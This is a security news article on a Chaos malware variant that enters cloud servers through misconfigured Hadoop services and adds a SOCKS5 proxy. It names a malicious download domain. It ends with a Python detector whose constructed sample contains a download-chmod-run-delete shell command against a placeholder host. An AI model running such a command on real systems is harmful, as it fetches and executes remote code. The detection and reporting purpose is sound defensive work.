New Chaos malware targets cloud misconfigs
A new Chaos malware variant is exploiting misconfigured cloud services to install payloads and use proxy routing that helps it evade detection. (x.com) The report highlights continued risk from exposed services rather than just software bugs, complicating cloud-security hygiene for teams running distributed workloads. (x.com)
Cloud attacks do not always start with a software bug. In Darktrace’s March 2026 honeypot, the attacker got in through an Apache Hadoop service that was simply left misconfigured, then used that opening to drop a new Chaos malware sample on a Linux cloud server. (darktrace.com)

Apache Hadoop is a system for splitting huge data jobs across many machines, like breaking one giant spreadsheet into pieces and handing each piece to a different worker. If the service is exposed with the wrong settings, an outsider can send it a job that is really just their own command. (darktrace.com) That is what Darktrace saw here. The attacker sent a Hypertext Transfer Protocol request to Hadoop’s resource manager endpoint, created a fake application, and stuffed shell commands into the job so the server would download and run malware for them. (helpnetsecurity.com) The shell sequence was simple and fast: fetch a file from pan.tenire[.]com, change its permissions so it can run, execute it, and then delete the file from disk. Deleting the file after launch cuts down the evidence left behind for incident responders. (darktrace.com)

Chaos is not a brand-new malware family. Lumen’s Black Lotus Labs publicly described it in September 2022 as a botnet written in the Go programming language that could hit Windows, Linux, routers, and enterprise servers, and linked it to distributed denial-of-service attacks and cryptomining. (lumen.com) Earlier Chaos samples mostly chased routers and edge devices, which usually run on ARM, MIPS, or PowerPC chips. The March 2026 sample Darktrace caught was a 64-bit Executable and Linkable Format file for x86-64 Linux, which is the kind of processor setup you expect in cloud servers. (helpnetsecurity.com)

The malware also changed shape after it landed. Darktrace said this version dropped some older spreading features, including Secure Shell brute forcing, and kept the parts that let operators hold the machine, survive reboots with systemd, and launch network floods over Hypertext Transfer Protocol, Transmission Control Protocol, User Datagram Protocol, Transport Layer Security, and WebSocket traffic. (helpnetsecurity.com)

The new piece is a SOCKS5 proxy. A proxy is a relay box on the internet, like making your call through someone else’s phone, and Darktrace said Chaos can now listen on an attacker-chosen Transmission Control Protocol port and forward the attacker’s traffic through the victim server. (helpnetsecurity.com) That changes what an infected cloud server is worth. Instead of using the box only for cryptomining or a denial-of-service flood, the operator can also rent or use that server as a hidden jump point, making later attacks appear to come from the victim’s internet address and reach internal systems that only the victim server can see. (darktrace.com)

Darktrace also noted that the download domain had shown up before in Operation Silk Lure, a campaign tied to ValleyRAT malware delivered through fake job application lures. That does not prove the same crew is behind both operations, but it does show that one exposed cloud service can pull a company into a much wider criminal infrastructure. (darktrace.com)
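One way a defender can spot the Hadoop job abuse described above is to inspect the launch command inside each application body posted to the ResourceManager REST endpoint and flag the fetch, chmod, execute, delete sequence. The following is an added example, not code from Darktrace or the Hadoop project; the two submission bodies are constructed, and the download host is a placeholder rather than the indicator from the report.

```python
"""Flag YARN application submissions whose AM launch command looks like a
download-chmod-run-delete dropper. Added example; samples are constructed."""
import json
import re

# One pattern per stage of the dropper sequence the report describes.
STAGES = {
    "download": re.compile(r"\b(curl|wget)\b.*https?://"),
    "chmod": re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"),
    # A bare path run after a separator, typically from a scratch directory.
    "execute": re.compile(r"(^|[;&|]\s*)(\./|/tmp/|/dev/shm/)\S+"),
    "delete": re.compile(r"\brm\s+(-\w+\s+)*\S+"),
}

def command_stages(command: str) -> set:
    """Return the names of the dropper stages present in one shell command."""
    return {name for name, rx in STAGES.items() if rx.search(command)}

def is_suspicious(command: str, min_stages: int = 3) -> bool:
    """A normal application master launch (java ...) hits none of these."""
    return len(command_stages(command)) >= min_stages

def flag_submissions(bodies):
    """Given raw JSON bodies posted to /ws/v1/cluster/apps, return the ids of
    applications whose am-container-spec command looks like a dropper."""
    flagged = []
    for raw in bodies:
        body = json.loads(raw)
        spec = body.get("am-container-spec", {})
        cmd = spec.get("commands", {}).get("command", "")
        if is_suspicious(cmd):
            flagged.append(body.get("application-id", "<no id>"))
    return flagged

# Constructed sample submissions: a normal job and one mirroring the reported
# sequence (dropper.invalid is a placeholder host).
SAMPLES = [
    json.dumps({"application-id": "application_1700000000000_0001",
                "application-name": "wordcount", "application-type": "YARN",
                "am-container-spec": {"commands": {"command":
                    "{{JAVA_HOME}}/bin/java -Xmx256m org.example.AppMaster"}}}),
    json.dumps({"application-id": "application_1700000000000_0002",
                "application-name": "hadoop", "application-type": "YARN",
                "am-container-spec": {"commands": {"command":
                    "curl -o /tmp/x http://dropper.invalid/x; chmod +x /tmp/x; "
                    "/tmp/x; rm -f /tmp/x"}}}),
]

if __name__ == "__main__":
    print(flag_submissions(SAMPLES))
```

The same check can be run over ResourceManager audit records or a reverse proxy's captured request bodies; a benign launch that only fails one stage is left alone because the threshold requires three.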